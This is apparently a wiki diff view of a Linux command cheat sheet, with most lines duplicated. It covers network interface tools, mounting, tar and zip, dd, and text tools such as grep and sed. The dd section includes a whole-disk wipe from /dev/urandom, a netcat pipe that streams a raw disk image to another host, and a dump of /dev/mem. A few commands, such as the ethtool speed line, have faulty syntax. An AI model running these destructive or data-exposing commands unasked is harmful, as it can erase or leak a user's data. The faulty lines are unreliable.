</pre>
 
== 7 Useful Linux Networking Commands ==
== 7 Useful Linux Networking Commands ==
<pre>
ifconfig for basic interface and IP configuration
ifconfig for basic interface and IP configuration


   
   
Line 914: Line 472:
View current configuration of network interfaces, including the interface names:
View current configuration of network interfaces, including the interface names:
   
   
ifconfig
ifconfig
   
   
Turn an adapter on (up) or off (down):
Turn an adapter on (up) or off (down):
   
   
ifconfig <network name> <up|down>
ifconfig <network name> <up|down>
   
   
Assign an IP address to an adapter:
Assign an IP address to an adapter:
   
   
ifconfig <network name> <ip address>
ifconfig <network name> <ip address>
   
   
Assign a second IP address to an adapter:
Assign a second IP address to an adapter:
   
   
ifconfig <network name:instance number> <ip address>
ifconfig <network name:instance number> <ip address>
   
   
Example: ifconfig eth0:0 192.168.1.101
Example: ifconfig eth0:0 192.168.1.101
Line 936: Line 494:
Display the driver information for a specific network adapter, great when checking for software compatibility:  
Display the driver information for a specific network adapter, great when checking for software compatibility:  
   
   
ethtool -i <interface name>
ethtool -i <interface name>
   
   
Initiate an adapter-specific action, usually blinking the LED lights on the adapter, to help you identify between multiple adapters or interface names:
Initiate an adapter-specific action, usually blinking the LED lights on the adapter, to help you identify between multiple adapters or interface names:
   
   
ethtool -p <interface name>
ethtool -p <interface name>
   
   
Display network statistics:
Display network statistics:
   
   
ethtool -S
ethtool -S
   
   
Set the connection speed of the adapter in Mbps:
Set the connection speed of the adapter in Mbps:
   
   
ethtool speed <10|100|1000>  
ethtool speed <10|100|1000>  
   
   
iwconfig for wireless configuration
iwconfig for wireless configuration
Line 956: Line 514:
Display the wireless settings of your interfaces, including the interface names you'll need for other commands:
Display the wireless settings of your interfaces, including the interface names you'll need for other commands:
   
   
iwconfig
iwconfig
   
   
Set the ESSID (Extended Service Set Identifier) or network name:
Set the ESSID (Extended Service Set Identifier) or network name:
   
   
iwconfig <interface name> essid <network name>
iwconfig <interface name> essid <network name>
   
   
Example: iwconfig <interface name> "my network"
Example: iwconfig <interface name> "my network"
Line 968: Line 526:
Set the wireless channel of the radio (1-11):
Set the wireless channel of the radio (1-11):
   
   
iwconfig <interface name> <channel>
iwconfig <interface name> <channel>
   
   
Input a WEP encryption key (WPA/WPA2 isn't supported yet; for this you need wpa_supplicant):
Input a WEP encryption key (WPA/WPA2 isn't supported yet; for this you need wpa_supplicant):
   
   
iwconfig eth0 key <key in HEX format>
iwconfig eth0 key <key in HEX format>
   
   
Only allow the adapter to connect to an AP with the MAC address you specify:
Only allow the adapter to connect to an AP with the MAC address you specify:
   
   
iwconfig <interface name> ap <mac address>
iwconfig <interface name> ap <mac address>
   
   
Example: iwconfig eth0 ap 00:60:1D:01:23:45
Example: iwconfig eth0 ap 00:60:1D:01:23:45
Line 982: Line 540:
Set the transmit power of the radio, if supported by the wireless card, in dBm format by default or mW when specified:
Set the transmit power of the radio, if supported by the wireless card, in dBm format by default or mW when specified:
   
   
iwconfig <interface name> txpower <power level>
iwconfig <interface name> txpower <power level>
   
   
Example: iwconfig eth0 txpower 15
Example: iwconfig eth0 txpower 15
   
   
Example: iwconfig eth0 txpower 30mW
Example: iwconfig eth0 txpower 30mW
</pre>
 
== Accessing a Directory With a Space in The Filename ==
== Accessing a Directory With a Space in The Filename ==
<pre>
Eg. Directory name is: " Dir 001"
Eg. Directory name is: " Dir 001"


to Cd into that dir you would enter the command with a "\" : cd Dir\ 001
to Cd into that dir you would enter the command with a "\" :  
</pre>
cd Dir\ 001
 
== Manually Mount A Device in Ubuntu ==
== Manually Mount A Device in Ubuntu ==
<pre>
To manually mount a media device in the virtual directory, you'll need to be logged in as the root user. The basic command for manually mounting a media device is:
To manually mount a media device in the virtual directory, you'll need to be logged in as the root user. The basic command for manually mounting a media device is:
 
mount ‐t type device directory
mount ‐t type device directory
 
The type parameter defines the filesystem type the disk was formatted under. There are lots and lots of different filesystem types that Linux recognizes. If you share removable media devices with your Windows PCs, the types you're most likely to run into are:
The type parameter defines the filesystem type the disk was formatted under. There are lots and lots of different filesystem types that Linux recognizes. If you share removable media devices with your Windows PCs, the types you're most likely to run into are:
 
*vfat: Windows long filesystem.
vfat: Windows long filesystem.
*ntfs: Windows advanced filesystem used in Windows NT, XP, and Vista.
 
*iso9660: The standard CD‐ROM filesystem.
ntfs: Windows advanced filesystem used in Windows NT, XP, and Vista.
 
iso9660: The standard CD‐ROM filesystem.


Most USB memory sticks and floppies are formatted using the vfat filesystem. If you need to mount a data CD, you'll have to use the iso9660filesystem type.
Most USB memory sticks and floppies are formatted using the vfat filesystem. If you need to mount a data CD, you'll have to use the iso9660filesystem type.
The next two parameters define the location of the device file for the media device and the location in the virtual directory for the mount point. For example, to manually mount the USB memory stick at device /dev/sdb1 at location /media/disk, you'd use the command:
The next two parameters define the location of the device file for the media device and the location in the virtual directory for the mount point. For example, to manually mount the USB memory stick at device /dev/sdb1 at location /media/disk, you'd use the command:
 
mount ‐t vfat /dev/sdb1 /media/disk
mount ‐t vfat /dev/sdb1 /media/disk
 
Once a media device is mounted in the virtual directory, the root user will have full access to the device, but access by other users will be restricted. You can control who has access to the device using directory permissions.
Once a media device is mounted in the virtual directory, the root user will have full access to the device, but access by other users will be restricted. You can control who has access to the device using directory permissions.


‐a
‐a Mount all filesystems specified in the /etc/fstab file.
 
Mount all filesystems specified in the /etc/fstab file.
 
‐f
 
Causes the mount command to simulate mounting a device, but not actually mount it.
 
‐F
 
When used with the ‐a parameter, mounts all filesystems at the same time.
 
‐v
 
Verbose mode, explains all the steps required to mount the device.
 
‐I
 
Don't use any filesystem helper files under /sbin/mount.filesystem.
 
‐l
 
Add the filesystem labels automatically for ext2, ext3, or XFS filesystems.
 
‐n
 
Mount the device without registering it in the /etc/mstab mounted device file.


‐p num
‐f Causes the mount command to simulate mounting a device, but not actually mount it.


For encrypted mounting, read the passphrase from the file descriptor num.
‐F When used with the ‐a parameter, mounts all filesystems at the same time.


‐s
‐v Verbose mode, explains all the steps required to mount the device.


Ignore mount options not supported by the filesystem.
‐I Don't use any filesystem helper files under /sbin/mount.filesystem.


‐r
‐l Add the filesystem labels automatically for ext2, ext3, or XFS filesystems.


Mount the device as read‐only.
‐n Mount the device without registering it in the /etc/mstab mounted device file.


‐w
‐p num For encrypted mounting, read the passphrase from the file descriptor num.


Mount the device as read‐write (the default).
‐s Ignore mount options not supported by the filesystem.


‐L label
‐r Mount the device as read‐only.


Mount the device with the specified label.
‐w Mount the device as read‐write (the default).


‐U uuid
‐L label Mount the device with the specified label.


Mount the device with the specified uuid.
‐U uuid Mount the device with the specified uuid.


‐O
‐O When used with the ‐a parameter, limits the set of filesystems applied.
 
When used with the ‐a parameter, limits the set of filesystems applied.
 
‐o
 
Add specific options to the filesytem.


‐o Add specific options to the filesystem
.
The ‐o option allows you to mount the filesystem with a comma‐separated list of additional options. The popular options to use are:
The ‐o option allows you to mount the filesystem with a comma‐separated list of additional options. The popular options to use are:


Line 1,085: Line 602:


user: Allow an ordinary user to mount the filesystem.
user: Allow an ordinary user to mount the filesystem.
check=none: Mount the filesystem without performing an integrity check.
check=none: Mount the filesystem without performing an integrity check.


Line 1,091: Line 607:


A popular thing in Linux these days is to distribute a CD as a .iso file. The .iso file is a complete image of the CD in a single file. Most CD‐burning software packages can create a new CD based on the .iso file. A feature of the mount command is that you can mount a .iso file directly to your Linux virtual directory without having to burn it onto a CD. This is accomplished using the ‐o parameter with the loop option:
A popular thing in Linux these days is to distribute a CD as a .iso file. The .iso file is a complete image of the CD in a single file. Most CD‐burning software packages can create a new CD based on the .iso file. A feature of the mount command is that you can mount a .iso file directly to your Linux virtual directory without having to burn it onto a CD. This is accomplished using the ‐o parameter with the loop option:
$ mkdir mnt
$ su
Password:
# mount ‐t iso9660 ‐o loop MEPIS‐KDE4‐LIVE‐DVD_32.iso mnt


$ mkdir mnt
$ su
Password:
# mount ‐t iso9660 ‐o loop MEPIS‐KDE4‐LIVE‐DVD_32.iso mnt
</pre>
== Linux Directory Structure ==
== Linux Directory Structure ==
<pre>
{| class="wikitable"
 
|/||The root of the virtual directory. Normally, no files are placed here.
/
|-
 
|/bin
The root of the virtual directory. Normally, no files are placed here.
|The binary directory, where many GNU user‐level utilities are stored.
 
|-
/bin
|/boot
 
|The boot directory, where boot files are stored.
The binary directory, where many GNU user‐level utilities are stored.
|-
 
|/dev
/boot
|The device directory, where Linux creates device nodes.
 
|-
The boot directory, where boot files are stored.
|/etc
 
|The system configuration files directory.
/dev
|-
 
|/home
The device directory, where Linux creates device nodes.
|The home directory, where Linux creates user directories.
 
|-
/etc
|/lib
 
|The library directory, where system and application library files are stored.
The system configuration files directory.
|-
 
|/media
/home
|The media directory, a common place for mount points used for removable media.
 
|-
The home directory, where Linux creates user directories.
|/mnt
 
|The mount directory, another common place for mount points used for removable media.
/lib
|-
 
|/opt
The library directory, where system and application library files are stored.
|The optional directory, often used to store optional software packages.
 
|-
/media
|/root
 
|The root home directory.
The media directory, a common place for mount points used for removable media.
|-
 
|/sbin
/mnt
|The system binary directory, where many GNU admin‐level utilities are stored.
 
|-
The mount directory, another common place for mount points used for removable media.
|/tmp
 
|The temporary directory, where temporary work files can be created and destroyed.
/opt
|-
 
|/usr
The optional directory, often used to store optional software packages.
|The user‐installed software directory.
 
|-
/root
|/var
 
|The variable directory, for files that change frequently, such as log files
The root home directory.
 
/sbin
 
The system binary directory, where many GNU admin‐level utilities are stored.


/tmp
|}


The temporary directory, where temporary work files can be created and destroyed.
== TAR Files==  
 
/usr
 
The user‐installed software directory.
 
/var
 
The variable directory, for files that change frequently, such as log files
</pre>
== How to Use TAR zip ==  
<pre>
To inzip .bz2 files use:
To inzip .bz2 files use:


tar -jxvf filename.tar.bz2
tar -jxvf filename.tar.bz2


to unzip gz files use:
to unzip gz files use:
tar -zxvf filename.tar.gz


tar -zxvf filename.tar.gz
== Zip  Files==
 
zip and unzip
zip and unzip


To create a zip file containing dir1, dir2, ... :
To create a zip file containing dir1, dir2, ... :
zip -r <filename>.zip dir1 dir1 ...
zip -r <filename>.zip dir1 dir1 ...
To extract <filename>.zip:
To extract <filename>.zip:
unzip <filename>.zip
unzip <filename>.zip
 
   
   


Line 1,184: Line 681:
To combine multiple files and/or directories into a single file, use the following command:
To combine multiple files and/or directories into a single file, use the following command:


tar -cvf file.tar inputfile1 inputfile2
tar -cvf file.tar inputfile1 inputfile2


Replace inputfile1 and inputfile2 with the files and/or directories you want to combine. You can use any name in place of file.tar, though you should keep the .tar extension. If you don't use the  f  option, tar assumes you really do want to create a tape archive instead of joining up a number of files. The  v  option tells tar to be verbose, which reports all files as they are added.
Replace inputfile1 and inputfile2 with the files and/or directories you want to combine. You can use any name in place of file.tar, though you should keep the .tar extension. If you don't use the  f  option, tar assumes you really do want to create a tape archive instead of joining up a number of files. The  v  option tells tar to be verbose, which reports all files as they are added.
Line 1,190: Line 687:
To separate an archive created by tar into separate files, at the shell prompt, enter:
To separate an archive created by tar into separate files, at the shell prompt, enter:


tar -xvf file.tar
tar -xvf file.tar


Compressing and uncompressing tar files
Compressing and uncompressing tar files
Line 1,196: Line 693:
Many modern Unix systems, such as Linux, use GNU tar, a version of tar produced by the Free Software Foundation. If your system uses GNU tar, you can easily use gzip (the GNU file compression program) in conjunction with tar to create compressed archives. To do this, enter:
Many modern Unix systems, such as Linux, use GNU tar, a version of tar produced by the Free Software Foundation. If your system uses GNU tar, you can easily use gzip (the GNU file compression program) in conjunction with tar to create compressed archives. To do this, enter:


tar -cvzf file.tar.gz inputfile1 inputfile2
tar -cvzf file.tar.gz inputfile1 inputfile2


Here, the  z  option tells tar to zip the archive as it is created. To unzip such a zipped tar file, enter:
Here, the  z  option tells tar to zip the archive as it is created. To unzip such a zipped tar file, enter:


tar -xvzf file.tar.gz
tar -xvzf file.tar.gz


Alternatively, if your system does not use GNU tar, but nonetheless does have gzip, you can still create a compressed tar file, via the following command:
Alternatively, if your system does not use GNU tar, but nonetheless does have gzip, you can still create a compressed tar file, via the following command:


tar -cvf - inputfile1 inputfile2 | gzip > file.tar.gz
tar -cvf - inputfile1 inputfile2 | gzip > file.tar.gz


Note: If gzip isn't available on your system, use the Unix compress command instead. In the example above, replace gzip with compress and change the .gz extension to .Z (the compress command specifically looks for an uppercase Z). You can use other compression programs in this way as well. Just be sure to use the appropriate extension for the compressed file, so you can identify which program to use to decompress the file later.
Note: If gzip isn't available on your system, use the Unix compress command instead. In the example above, replace gzip with compress and change the .gz extension to .Z (the compress command specifically looks for an uppercase Z). You can use other compression programs in this way as well. Just be sure to use the appropriate extension for the compressed file, so you can identify which program to use to decompress the file later.
Line 1,210: Line 707:
If you are not using GNU tar, to separate a tar archive that was compressed by gzip, enter:
If you are not using GNU tar, to separate a tar archive that was compressed by gzip, enter:


gunzip -c file.tar.gz | tar -xvf -
gunzip -c file.tar.gz | tar -xvf -


Similarly, to separate a tar archive compressed with the Unix compress command, replace gunzip with uncompress .
Similarly, to separate a tar archive compressed with the Unix compress command, replace gunzip with uncompress .
Line 1,227: Line 724:
The tar command has many additional command options available. For more information, consult the manual page. At the shell prompt, enter:
The tar command has many additional command options available. For more information, consult the manual page. At the shell prompt, enter:


man tar
man tar


GNU tar comes with additional documentation, including a tutorial, accessible through the GNU Info interface. You can access this documentation by entering:
GNU tar comes with additional documentation, including a tutorial, accessible through the GNU Info interface. You can access this documentation by entering:


info tar Within the Info interface, press  ?  (the question mark) for a list of commands
info tar Within the Info interface, press  ?  (the question mark) for a list of commands
</pre>
 
== Using The DD Unix Command ==
== DD Unix Command ==
<pre>
dd is a common Unix program whose primary purpose is the low-level copying and conversion of raw data
dd is a common Unix program whose primary purpose is the low-level copying and conversion of raw data


Line 1,241: Line 737:
Example use of dd command to create an ISO disk image from a CD-ROM:
Example use of dd command to create an ISO disk image from a CD-ROM:


dd if=/dev/cdrom of=/home/sam/myCD.iso bs=2048 conv=sync,notrunc
dd if=/dev/cdrom of=/home/sam/myCD.iso bs=2048 conv=sync,notrunc
Note that an attempt to copy the entire disk image using cp may omit the final block if it is an unexpected length; dd will always complete the copy if possible.
Note that an attempt to copy the entire disk image using cp may omit the final block if it is an unexpected length; dd will always complete the copy if possible.


Using dd to wipe an entire disk with random data:
Using dd to wipe an entire disk with random data:


dd if=/dev/urandom of=/dev/hda
dd if=/dev/urandom of=/dev/hda


Using dd to duplicate one hard disk partition to another hard disk:
Using dd to duplicate one hard disk partition to another hard disk:


dd if=/dev/sda2 of=/dev/sdb2 bs=4096 conv=notrunc,noerror
dd if=/dev/sda2 of=/dev/sdb2 bs=4096 conv=notrunc,noerror
Note that notrunc means do not truncate the output file. Noerror means to keep going if there is an error (though a better tool for this would be ddrescue).
Note that notrunc means do not truncate the output file. Noerror means to keep going if there is an error (though a better tool for this would be ddrescue).


Line 1,274: Line 770:
To search the system memory:
To search the system memory:


dd if=/dev/mem | hexdump -C | grep 'some-string-of-words-in-the-file-you-forgot-to-save-before-you-hit-the-close-button'
dd if=/dev/mem | hexdump -C | grep 'some-string-of-words-in-the-file-you-forgot-to-save-before-you-hit-the-close-button'


Image a partition to another machine:
Image a partition to another machine:


On source machine:
On source machine:
  dd if=/dev/hda bs=16065b | netcat < targethost-IP > 1234
dd if=/dev/hda bs=16065b | netcat < targethost-IP > 1234
On target machine:
On target machine:
  netcat -l -p 1234 | dd of=/dev/hdc bs=16065b
netcat -l -p 1234 | dd of=/dev/hdc bs=16065b
Everybody has mentioned the first obvious fix: raise your blocksize from the default 512 bytes. The second fix addresses the problem that with a single dd, you are either reading or writing. If you pipe the first dd into a second one, it'll let you run at the max speed of the slowest device.
Everybody has mentioned the first obvious fix: raise your blocksize from the default 512 bytes. The second fix addresses the problem that with a single dd, you are either reading or writing. If you pipe the first dd into a second one, it'll let you run at the max speed of the slowest device.
</pre>
 
== Ubuntu Text Editors and Other commands for Manipulating Text==  
== Ubuntu Text Editors and Other commands for Manipulating Text==  
<pre>
===Nano Text Editor===
Nano Text Editor


$ nano memo.txt Open memo.txt for editing
$ nano memo.txt Open memo.txt for editing
$ nano -B memo.txt When saving, back up previous to ~.filename
$ nano -B memo.txt When saving, back up previous to ~.filename
$ nano -m memo.txt Turn on mouse to move cursor (if supported)
$ nano -m memo.txt Turn on mouse to move cursor (if supported)
$ nano +83 memo.txt Begin editing on line 83
$ nano +83 memo.txt Begin editing on line 83
The -m command-line option turns on support for a mouse. You can use the mouse to select a position in the text, and the cursor moves to that position. After the first click, though, nano uses the mouse to mark a block of text, which may not be what you are expecting.
The -m command-line option turns on support for a mouse. You can use the mouse to select a position in the text, and the cursor moves to that position. After the first click, though, nano uses the mouse to mark a block of text, which may not be what you are expecting.


Listing, Sorting, and Changing Text
====Listing, Sorting, and Changing Text====
Instead of just editing a single text file, you can use a variety of Linux commands to display, search, and manipulate the contents of one or more text files at a time.
Instead of just editing a single text file, you can use a variety of Linux commands to display, search, and manipulate the contents of one or more text files at a time.
Listing Text Files
Listing Text Files
The most basic method to display the contents of a text file is with the cat command. The cat command concatenates (in other words, outputs as a string of characters) the contents of a text file to your display (by default). You can then use different shell metacharacters to direct the contents of that file in different ways. For example:
The most basic method to display the contents of a text file is with the cat command. The cat command concatenates (in other words, outputs as a string of characters) the contents of a text file to your display (by default). You can then use different shell metacharacters to direct the contents of that file in different ways. For example:
$ cat myfile.txt Send entire file to the screen
$ cat myfile.txt Send entire file to the screen
$ cat myfile.txt > copy.txt Direct file contents to another file
$ cat myfile.txt > copy.txt Direct file contents to another file
$ cat myfile.txt >> myotherfile.txt Append file contents to another file
$ cat myfile.txt >> myotherfile.txt Append file contents to another file
$ cat -s myfile.txt Display consecutive blank lines as one
$ cat -s myfile.txt Display consecutive blank lines as one
$ cat -n myfile.txt Show line numbers with output
$ cat -n myfile.txt Show line numbers with output
$ cat -b myfile.txt Show line numbers only on non-blank lines
$ cat -b myfile.txt Show line numbers only on non-blank lines
However, if your block of text is more than a few lines long, using cat by itself becomes impractical. That's when you need better tools to look at the beginning or the end, or page through the entire text.
However, if your block of text is more than a few lines long, using cat by itself becomes impractical. That's when you need better tools to look at the beginning or the end, or page through the entire text.


To view the top of a file, use head:
====To view the top of a file, use head:====
$ head myfile.txt
$ head myfile.txt
$ cat myfile.txt | head
$ cat myfile.txt | head
Both of these command lines use the head command to output the top 10 lines of the file. You can specify the line count as a parameter to display any number of lines from the beginning of a file. For example:
Both of these command lines use the head command to output the top 10 lines of the file. You can specify the line count as a parameter to display any number of lines from the beginning of a file. For example:


$ head -n 50 myfile.txt Show the first 50 lines of a file
$ head -n 50 myfile.txt Show the first 50 lines of a file
$ ps auwx | head -n 15 Show the first 15 lines of ps output
$ ps auwx | head -n 15 Show the first 15 lines of ps output
This can also be done using this obsolete (but shorter) syntax:
This can also be done using this obsolete (but shorter) syntax:


$ head -50 myfile.txt
$ head -50 myfile.txt
$ ps auwx | head -15
$ ps auwx | head -15
You can use the tail command in a similar way to view the end of a file:
You can use the tail command in a similar way to view the end of a file:


$ tail -n 15 myfile.txt Display the last 15 lines in a file
$ tail -n 15 myfile.txt Display the last 15 lines in a file
$ tail -15 myfile.txt Display the last 15 lines in a file
$ tail -15 myfile.txt Display the last 15 lines in a file
$ ps auwx | tail -n 15 Display the last 15 lines of ps output
$ ps auwx | tail -n 15 Display the last 15 lines of ps output
The tail command can also be used to continuously watch the end of a file as the file is written to by another program. This is very useful for reading live log files when troubleshooting apache, sendmail, or many other system services:
The tail command can also be used to continuously watch the end of a file as the file is written to by another program. This is very useful for reading live log files when troubleshooting apache, sendmail, or many other system services:


# tail -f /var/log/messages Watch system messages live
# tail -f /var/log/messages Watch system messages live
# tail -f /var/log/maillog Watch mail server messages live
# tail -f /var/log/maillog Watch mail server messages live
# tail -f /var/log/httpd/access_log Watch web server messages live
# tail -f /var/log/httpd/access_log Watch web server messages live
Paging Through Text
====Paging Through Text====
When you have a large chunk of text and need to get to more than just its beginning or end, you need a tool to page through the text. The original Unix system pager was the more command:
When you have a large chunk of text and need to get to more than just its beginning or end, you need a tool to page through the text. The original Unix system pager was the more command:


$ ps auwx | more Page through the output of ps (press spacebar)
$ ps auwx | more Page through the output of ps (press spacebar)
$ more myfile.txt Page through the contents of a file
$ more myfile.txt Page through the contents of a file
However, more has some limitations. For example, in the line with ps above, more could not scroll up. The less command was created as a more powerful and user-friendly more. The common saying when less was introduced was: "What is less? less is more!" We recommend you no longer use more, and use less instead.
However, more has some limitations. For example, in the line with ps above, more could not scroll up. The less command was created as a more powerful and user-friendly more. The common saying when less was introduced was: "What is less? less is more!" We recommend you no longer use more, and use less instead.


Line 1,337: Line 832:
The less command has another benefit worth noting. Unlike text editors such as vi, it does not read the entire file when it starts. This results in faster start-up times when viewing large files.
The less command has another benefit worth noting. Unlike text editors such as vi, it does not read the entire file when it starts. This results in faster start-up times when viewing large files.
The less command can be used with the same syntax as more in the examples above:
The less command can be used with the same syntax as more in the examples above:
$ ps auwx | less Page through the output of ps
$ ps auwx | less Page through the output of ps
$ cat myfile.txt | less Page through the contents of a file
$ cat myfile.txt | less Page through the contents of a file
$ less myfile.txt Page through a text file
$ less myfile.txt Page through a text file
The less command enables you to navigate using the up and down arrow keys, PageUp, PageDown, and the spacebar. If you are using less on a file (not standard input), press v to open the current file in an editor. Which editor gets launched is determined by environment variables defined for your account. The editor is taken from the environment variable VISUAL, if defined, or EDITOR if VISUAL is not defined. If neither is defined, less invokes the JOE editor on Ubuntu.
The less command enables you to navigate using the up and down arrow keys, PageUp, PageDown, and the spacebar. If you are using less on a file (not standard input), press v to open the current file in an editor. Which editor gets launched is determined by environment variables defined for your account. The editor is taken from the environment variable VISUAL, if defined, or EDITOR if VISUAL is not defined. If neither is defined, less invokes the JOE editor on Ubuntu.


Line 1,346: Line 841:
Press Ctrl+c to interrupt that mode. As in vi, while viewing a file with less, you can search for a string by pressing / (forward slash) followed by the string and Enter. To search for further occurrences, press / and Enter repeatedly.
Press Ctrl+c to interrupt that mode. As in vi, while viewing a file with less, you can search for a string by pressing / (forward slash) followed by the string and Enter. To search for further occurrences, press / and Enter repeatedly.
To scroll forward and back while using less, use the F and B keys, respectively. For example, 10f scrolls forward 10 lines and 15b scrolls back 15 lines. Type d to scroll down half a screen and u to scroll up half a screen.
To scroll forward and back while using less, use the F and B keys, respectively. For example, 10f scrolls forward 10 lines and 15b scrolls back 15 lines. Type d to scroll down half a screen and u to scroll up half a screen.
Searching for Text with grep
====Searching for Text with grep====
The grep command comes in handy when you need to perform more advanced string searches in a file. In fact, the phrase to grep has actually entered the computer jargon as a verb, just as to Google has entered the popular language. Here are examples of the grep command:
The grep command comes in handy when you need to perform more advanced string searches in a file. In fact, the phrase to grep has actually entered the computer jargon as a verb, just as to Google has entered the popular language. Here are examples of the grep command:
$ grep francois myfile.txt Show lines containing francois
$ grep francois myfile.txt Show lines containing francois
# grep 404 /var/log/httpd/access_log Show lines containing 404
# grep 404 /var/log/httpd/access_log Show lines containing 404
$ ps auwx | grep init Show init lines from ps output
$ ps auwx | grep init Show init lines from ps output
$ ps auwx | grep "\[*\]" Show bracketed commands
$ ps auwx | grep "\[*\]" Show bracketed commands
$ dmesg | grep "[ ]ata\|^ata" Show ata kernel device information
$ dmesg | grep "[ ]ata\|^ata" Show ata kernel device information
These command lines have some particular uses, beyond being examples of the grep command. By searching access_log for 404 you can see requests to your web server for pages that were not found (these could be someone fishing to exploit your system, or a web page you moved or forgot to create). Displaying bracketed commands that are output from the ps command is a way to see commands for which ps cannot display options. The last command checks the kernel buffer ring for any ATA device information, such as hard disks and CD-ROM drives.
These command lines have some particular uses, beyond being examples of the grep command. By searching access_log for 404 you can see requests to your web server for pages that were not found (these could be someone fishing to exploit your system, or a web page you moved or forgot to create). Displaying bracketed commands that are output from the ps command is a way to see commands for which ps cannot display options. The last command checks the kernel buffer ring for any ATA device information, such as hard disks and CD-ROM drives.


The grep command can also recursively search a few or a whole lot of files at the same time. The following command recursively searches files in the /etc/httpd/conf and /etc/httpd/conf.d directories for the string VirtualHost:
The grep command can also recursively search a few or a whole lot of files at the same time. The following command recursively searches files in the /etc/httpd/conf and /etc/httpd/conf.d directories for the string VirtualHost:
$ grep -R VirtualHost /etc/httpd/conf*
$ grep -R VirtualHost /etc/httpd/conf*
Note that your system may not have any files with names starting with conf in the /etc/httpd directory, depending on what you have installed on your system. You can apply this technique to other files as well.
Note that your system may not have any files with names starting with conf in the /etc/httpd directory, depending on what you have installed on your system. You can apply this technique to other files as well.


Add line numbers (-n) to your grep command to find the exact lines where the search terms occur:
Add line numbers (-n) to your grep command to find the exact lines where the search terms occur:
$ grep -Rn VirtualHost /etc/httpd/conf*
$ grep -Rn VirtualHost /etc/httpd/conf*
To colorize the searched term in the search results, add the --color option:
To colorize the searched term in the search results, add the --color option:


$ grep --color -Rn VirtualHost /etc/httpd/conf*
$ grep --color -Rn VirtualHost /etc/httpd/conf*
By default, in a multifile search, the file name is displayed for each search result. Use the -h option to disable the display of file names. This example searches for the string sshd in the file auth.log:
By default, in a multifile search, the file name is displayed for each search result. Use the -h option to disable the display of file names. This example searches for the string sshd in the file auth.log:


$ grep -h sshd /var/log/auth.log
$ grep -h sshd /var/log/auth.log
If you want to ignore case when you search messages, use the -i option:
If you want to ignore case when you search messages, use the -i option:


$ grep -i selinux /var/log/messages Search file for selinux (any case)
$ grep -i selinux /var/log/messages Search file for selinux (any case)
To display only the name of the file that includes the search term, add the -l option:
To display only the name of the file that includes the search term, add the -l option:


$ grep -Rl VirtualHost /etc/httpd/conf*
$ grep -Rl VirtualHost /etc/httpd/conf*
To display all lines that do not match the string, add the -v option:
To display all lines that do not match the string, add the -v option:


$ grep -v "200 "/var/log/httpd/access_log* Show lines without "200 "
$ grep -v "200 "/var/log/httpd/access_log* Show lines without "200 "
  Note
  Note
When piping the output of ps into grep, here's a trick to prevent the grep process from appearing in the grep results:
When piping the output of ps into grep, here's a trick to prevent the grep process from appearing in the grep results:


# ps auwx | grep "[i]nit"
# ps auwx | grep "[i]nit"
Replacing Text with Sed
====Replacing Text with Sed====
Finding text within a file is sometimes the first step towards replacing text. Editing streams of text is done using the sed command. The sed command is actually a full-blown scripting language. For the examples in this chapter, we cover basic text replacement with the sed command.
Finding text within a file is sometimes the first step towards replacing text. Editing streams of text is done using the sed command. The sed command is actually a full-blown scripting language. For the examples in this chapter, we cover basic text replacement with the sed command.
If you are familiar with text replacement commands in vi, sed has some similarities. In the following example, you would replace only the first occurrence per line of francois with chris. Here, sed takes its input from a pipe, while sending its output to stdout (your screen):
If you are familiar with text replacement commands in vi, sed has some similarities. In the following example, you would replace only the first occurrence per line of francois with chris. Here, sed takes its input from a pipe, while sending its output to stdout (your screen):
$ cat myfile.txt | sed s/francois/chris/
$ cat myfile.txt | sed s/francois/chris/
Adding a g to the end of the substitution line, as in the following command, causes every occurrence of francois to be changed to chris. Also, in the following example, input is directed from the file myfile.txt and output is directed to mynewfile.txt:
Adding a g to the end of the substitution line, as in the following command, causes every occurrence of francois to be changed to chris. Also, in the following example, input is directed from the file myfile.txt and output is directed to mynewfile.txt:


$ sed s/francois/chris/g < myfile.txt > mynewfile.txt
$ sed s/francois/chris/g < myfile.txt > mynewfile.txt
The next example replaces the first occurrences of of the text /home/bob to /home2/bob from the /etc/passwd file. (Note that this command does not change that file, but outputs the changed text.) This is useful for the case when user accounts are migrated to a new directory (presumably on a new disk), named with much deliberation, home2. Here, we have to use quotes and backslashes to escape the forward slashes so they are not interpreted as delimiters:
The next example replaces the first occurrences of of the text /home/bob to /home2/bob from the /etc/passwd file. (Note that this command does not change that file, but outputs the changed text.) This is useful for the case when user accounts are migrated to a new directory (presumably on a new disk), named with much deliberation, home2. Here, we have to use quotes and backslashes to escape the forward slashes so they are not interpreted as delimiters:


$ sed 's/\/home\/bob/\/home2\/bob/g' < /etc/passwd
$ sed 's/\/home\/bob/\/home2\/bob/g' < /etc/passwd
Although the forward slash is the sed command's default delimiter, you can change the delimiter to any other character of your choice. Changing the delimiter can make your life easier when the string contains slashes. For example, the previous command line that contains a path could be replaced with either of the following commands:
Although the forward slash is the sed command's default delimiter, you can change the delimiter to any other character of your choice. Changing the delimiter can make your life easier when the string contains slashes. For example, the previous command line that contains a path could be replaced with either of the following commands:


$ sed 's-/home/bob/-/home2/bob/-' < /etc/passwd
$ sed 's-/home/bob/-/home2/bob/-' < /etc/passwd
$ sed 'sD/home/bob/D/home2/bob/D' < /etc/passwd
$ sed 'sD/home/bob/D/home2/bob/D' < /etc/passwd
In the first line shown, a dash (-) is used as the delimiter. In the second case, the letter D is the delimiter.
In the first line shown, a dash (-) is used as the delimiter. In the second case, the letter D is the delimiter.


The sed command can run multiple substitutions at once, by preceding each one with -e. Here, in the text streaming from myfile.txt, all occurrences of francois are changed to FRANCOIS and occurrences of chris are changed to CHRIS:
The sed command can run multiple substitutions at once, by preceding each one with -e. Here, in the text streaming from myfile.txt, all occurrences of francois are changed to FRANCOIS and occurrences of chris are changed to CHRIS:
$ sed -e s/francois/FRANCOIS/g -e s/chris/CHRIS/g < myfile.txt
$ sed -e s/francois/FRANCOIS/g -e s/chris/CHRIS/g < myfile.txt
You can use sed to add newline characters to a stream of text. Where Enter appears, press the Enter key. The > on the second line is generated by bash, not typed in.
You can use sed to add newline characters to a stream of text. Where Enter appears, press the Enter key. The > on the second line is generated by bash, not typed in.


$ echo aaabccc | sed 's/b/\Enter
$ echo aaabccc | sed 's/b/\Enter
> /'
> /'
aaa
aaa
ccc
ccc
The trick just shown does not work on the left side of the sed substitution command. When you need to substitute newline characters, it's easier to use the tr command.
The trick just shown does not work on the left side of the sed substitution command. When you need to substitute newline characters, it's easier to use the tr command.


Translating or Removing Characters with tr
====Translating or Removing Characters with tr====
The tr command is an easy way to do simple character translations on the fly. In the following example, new lines are replaced with spaces, so all the files listed from the current directory are output on one line:
